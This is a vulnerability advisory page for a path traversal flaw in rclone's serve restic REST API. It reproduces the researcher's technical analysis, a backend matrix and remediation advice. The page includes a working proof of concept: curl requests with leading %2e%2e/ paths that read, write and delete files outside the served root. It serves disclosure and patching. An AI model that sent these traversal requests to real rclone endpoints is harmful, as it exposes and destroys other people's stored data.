Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
No authentication required by default; single crafted HTTP request suffices; full read, write, and delete impact on accessible objects outside configured root.
Primary rating from Vendor (https://github.com/rclone/rclone).
CVSS VectorVendor: https://github.com/rclone/rclone
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
Summary
rclone serve restic does not correctly reject URL paths beginning with ../. On affected backends, an attacker who can access the REST endpoint can read, create, overwrite, or delete objects outside the path configured by the operator.
The issue affects rclone v1.40 through rclone v1.74.4. The proof of concept and backend matrix were validated with the official Linux AMD64 binary for v1.74.4, and the latest master commit reviewed at the time (2217d38) contained the same vulnerable validation. The main proof of concept uses WsgiDAV as an independent storage server and one rclone process.
Affected versions
All releases from v1.40 through v1.74.4 are affected.
Affected components and backend propagation
The primary vulnerable component is the backend-independent WithRemote middleware in cmd/serve/restic/restic.go, lines 235-264. It accepts a leading parent component and stores that unsafe relative path in the request context. The REST handlers then pass the same value to whichever rclone backend the operator configured. Therefore, the flaw is not specific to WebDAV.
The backend determines whether the accepted ../ path escapes, is preserved, or is encoded as safe filename characters. The source locations and line numbers below correspond to the release used for dynamic testing:
| Layer or backend | File and function | Relevant lines | Path propagation | Dynamic evidence |
|---|---|---|---|---|
| REST server, primary cause | cmd/serve/restic/restic.go, WithRemote | 235-264 | Accepts a leading ../ remote and shares it with GET, HEAD, POST, and DELETE handlers | Confirmed through WebDAV |
| WebDAV | backend/webdav/webdav.go, (*Fs).filePath | 421-427 | path.Join(f.root, file) removes the configured root when resolving ../ | read, write, delete |
| FTP | backend/ftp/ftp.go, (*Fs).NewObject, (*Object).Open, Update, and Remove | 844-848, 1308-1311, 1349-1356, 1411-1415 | Each operation joins the backend root and remote with path.Join before the FTP request | read, write, delete |
| HTTP | backend/http/http.go, (*Fs).url | 386-395 | Appends the escaped remote containing ../ to the configured endpoint URL | read |
| Memory | backend/memory/memory.go, (*Fs).split | 227-231 | Joins f.root and the relative path before splitting the in-memory bucket and key | read, write, delete |
| SFTP | backend/sftp/sftp.go, (*Fs).remotePath | 2086-2089 | Joins f.absRoot and the remote, allowing the parent component to remove the published subdirectory | read, write, delete |
These are backend-specific manifestations of the same WithRemote validation flaw, not separate vulnerabilities.
Technical Details
WithRemote obtains the decoded URL path, removes external slashes, and tries to reject traversal by comparing the path with path.Clean:
urlpath = strings.Trim(urlpath, "/")
// Reject any non-canonical path, in particular one containing ".."
// traversal elements.
if urlpath != "" && path.Clean(urlpath) != urlpath {
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}The comment describes the intended behavior, but the condition does not reject every parent component. path.Clean preserves leading parent components in a relative path:
path.Clean("../outside.txt") = "../outside.txt"
path.Clean("../../outside.txt") = "../../outside.txt"Because both strings are equal, the middleware accepts the path. Internal traversal behaves differently:
path.Clean("a/../../outside.txt") = "../outside.txt"These strings differ, so that request returns HTTP 400. This explains why the existing check appears to work while the leading variant bypasses it.
After validation, WithRemote stores the accepted value in the request context:
ctx := context.WithValue(r.Context(), ContextRemoteKey, urlpath)
next.ServeHTTP(w, r.WithContext(ctx))GET, POST, and DELETE handlers retrieve this same value. GET passes it to s.f.NewObject, POST passes it to operations.RcatSize, and DELETE resolves the object and calls Remove. There is no second containment check.
WebDAV is used below as the concrete end-to-end example because it was the backend used for the main proof of concept. WebDAV is not the source of the validation flaw. The example demonstrates one way in which an unsafe remote accepted by WithRemote is propagated by a backend.
The WebDAV backend joins its configured root with the attacker-controlled remote:
func (f *Fs) filePath(file string) string {
subPath := path.Join(f.root, file)
if f.opt.Enc != encoder.EncodeZero {
subPath = f.opt.Enc.FromStandardPath(subPath)
}
return rest.URLPathEscapeAll(subPath)
}For the proof of concept:
f.root = "served-root"
file = "../outside-secret.txt"
path.Join("served-root", "../outside-secret.txt")
= "outside-secret.txt"The configured root is removed before encoding. WsgiDAV receives a normal operation for /outside-secret.txt, which is outside the root published by rclone serve restic.
The same accepted leading parent path propagates through the other affected backends tested. FTP joins its root and remote with path.Join before object operations; HTTP preserves served-root/../outside-secret.txt when constructing the endpoint request; Memory joins the root and relative path before splitting the bucket and key; and SFTP joins f.absRoot and the remote in remotePath. In each case, the backend receives the leading parent component already accepted by WithRemote. The exact escape mechanism and available operations vary by backend. Conversely, S3-compatible and local backends did not escape in the tested configuration because they encoded .. as filename characters.
Expected behavior is HTTP 400 before any backend operation. Actual behavior is HTTP 200 followed by an operation outside served-root.
Preconditions and impact
The operator must publish a backend subdirectory, the endpoint must be reachable, and the backend credential must have access to a parent or sibling object. Exploitability also depends on backend path semantics.
An attacker may:
- read files and objects outside the published backup root;
- create or overwrite sibling objects;
- delete objects when deletion is permitted;
- cross isolation boundaries between users, repositories, or automation jobs;
- indirectly compromise another system if it later trusts an overwritten configuration, script, or artifact.
--append-only reduces overwrite and delete impact but does not prevent traversal reads or creation of new objects.
Proof of concept
The following procedure was executed on Linux Mint 22.3 with the official rclone v1.74.4 Linux AMD64 binary, WsgiDAV 4.3.5, and Cheroot 10.0.1. The rclone binary reports that it was built with Go 1.26.5.
1. Create the storage layout
$ mkdir -p poc/storage/served-root
$ printf '%s\n' 'INSIDE-PUBLISHED-ROOT' > poc/storage/served-root/inside.txt
$ printf '%s\n' 'SECRET-OUTSIDE-PUBLISHED-ROOT' > poc/storage/outside-secret.txt
$ find poc/storage -type f
poc/storage/served-root/inside.txt
poc/storage/outside-secret.txt2. Start the independent WebDAV server
$ python3 -m venv poc/venv
$ poc/venv/bin/pip install 'WsgiDAV==4.3.5' 'cheroot==10.0.1'
$ poc/venv/bin/wsgidav --host=127.0.0.1 --port=39500 \
--root="$PWD/poc/storage" --auth=anonymous --no-config
Running without configuration file.
...
Server: WsgiDAV/4.3.5 Cheroot/10.0.1 Python/3.12.33. Download, verify, and start rclone
$ curl -fLO https://downloads.rclone.org/v1.74.4/rclone-v1.74.4-linux-amd64.zip
$ curl -fLO https://downloads.rclone.org/v1.74.4/SHA256SUMS
$ grep ' rclone-v1.74.4-linux-amd64.zip$' SHA256SUMS | sha256sum -c -
rclone-v1.74.4-linux-amd64.zip: OK
$ unzip rclone-v1.74.4-linux-amd64.zip
$ ./rclone-v1.74.4-linux-amd64/rclone version | head -n 1
rclone v1.74.4
$ ./rclone-v1.74.4-linux-amd64/rclone serve restic ':webdav:served-root' \
--webdav-url http://127.0.0.1:39500 \
--webdav-vendor other --addr 127.0.0.1:39501 -vv
NOTICE: webdav root 'served-root': Serving restic REST API on [http://127.0.0.1:39501/]4. Confirm normal access
$ curl --path-as-is -i http://127.0.0.1:39501/inside.txt
HTTP/1.1 200 OK
...
INSIDE-PUBLISHED-ROOT5. Read outside the published root
$ curl --path-as-is -i http://127.0.0.1:39501/%2e%2e/outside-secret.txt
HTTP/1.1 200 OK
...
SECRET-OUTSIDE-PUBLISHED-ROOT6. Write outside the published root
$ curl --path-as-is -i -X POST \
http://127.0.0.1:39501/%2e%2e/outside-write.txt \
--data-binary 'ATTACKER-CONTROLLED-OUTSIDE-ROOT'
HTTP/1.1 200 OK
...
$ cat poc/storage/outside-write.txt
ATTACKER-CONTROLLED-OUTSIDE-ROOT7. Delete outside the published root
$ curl --path-as-is -i -X DELETE \
http://127.0.0.1:39501/%2e%2e/outside-write.txt
HTTP/1.1 200 OK
...
$ test ! -e poc/storage/outside-write.txt && echo 'physical file deleted'
physical file deleted8. Compare with internal traversal
$ curl --path-as-is -i http://127.0.0.1:39501/a/../../outside-secret.txt
HTTP/1.1 400 Bad Request
...
Bad RequestThis demonstrates why the existing check appears to work for interior traversal while the leading variant bypasses it.
Tested backends
| Backend | Local implementation | Result | Operations tested |
|---|---|---|---|
| WebDAV | WsgiDAV 4.3.5 | Affected | read, write, delete |
| FTP | pyftpdlib 2.2.0 | Affected | read, write, delete |
| HTTP | Python http.server 3.12.3 | Affected | read |
| Memory | rclone memory backend | Affected | read, write, delete |
| SFTP | atmoz/sftp OpenSSH server | Affected | read, write, delete |
| S3 compatible | MinIO | No root escape observed | read, write, delete |
| Local filesystem | default local encoding | No root escape observed | read, write, delete |
Only the backends listed in this table were tested or classified. Every row was dynamically repeated with the same official v1.74.4 Linux AMD64 binary identified in the proof of concept.
Suggested remediation
Reject . and .. components in WithRemote before storing the remote in the context. Validating the decoded relative path with io/fs.ValidPath, with explicit handling for the empty API root, is one possible approach. Authorization and backend lookup should use the same validated representation.
Regression tests should cover GET, HEAD, POST, and DELETE with .., ../x, ../../x, %2e%2e/x, a/../x, and a/../../x, both with and without --private-repos.
Additional impact scenarios identified by the maintainer
GET /../could reach the list handler and enumerate the parent directory, allowing an attacker to discover object names before accessing them.- With
--append-only, a request such asDELETE /../locks/<name>could satisfy the existing delete guard and delete an object outside the served root. - A bare
.path was also accepted. On bucket-based backends,POST /.could write an object outside the intended served path.
Credit: Caubi Loureiro of Vorpcel Research
AnalysisAI
Path traversal in rclone's serve restic REST API allows any attacker with network access to the endpoint to read, create, overwrite, or delete objects outside the operator-configured backend directory. The flaw spans rclone v1.40 through v1.74.4 and affects WebDAV, FTP, SFTP, HTTP, and Memory backends - but not S3-compatible or local filesystem backends, which encode .. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The operator must be running `rclone serve restic` - this subcommand is not active in default rclone usage and must be deliberately started. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | No CVSS score or EPSS data was provided by NVD or the vendor at time of analysis; all metric assessments below are independently derived from the description and commit diff. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker discovers a publicly reachable `rclone serve restic` endpoint and sends a GET request with a percent-encoded traversal path such as `GET /%2e%2e/outside-secret.txt` using `curl --path-as-is`. The request bypasses the `WithRemote` path validation (because `path.Clean('../outside-secret.txt')` equals `'../outside-secret.txt'`), the WebDAV or SFTP backend resolves the path outside the configured root, and the server returns the contents of the sibling file. … |
| Remediation | Upgrade to rclone v1.75.0, which resolves the flaw by replacing the flawed `path.Clean` comparison with `io/fs.ValidPath()` in `WithRemote` (commit cc5a189f00efe68ed0ddb32d3237b42549a9f264). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours, identify and document all rclone deployments running versions 1.40 through 1.74.4, particularly those using WebDAV, FTP, SFTP, HTTP, or Memory backends, and assess their exposure to network-accessible endpoints. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-53613
GHSA-45pq-889g-fcgh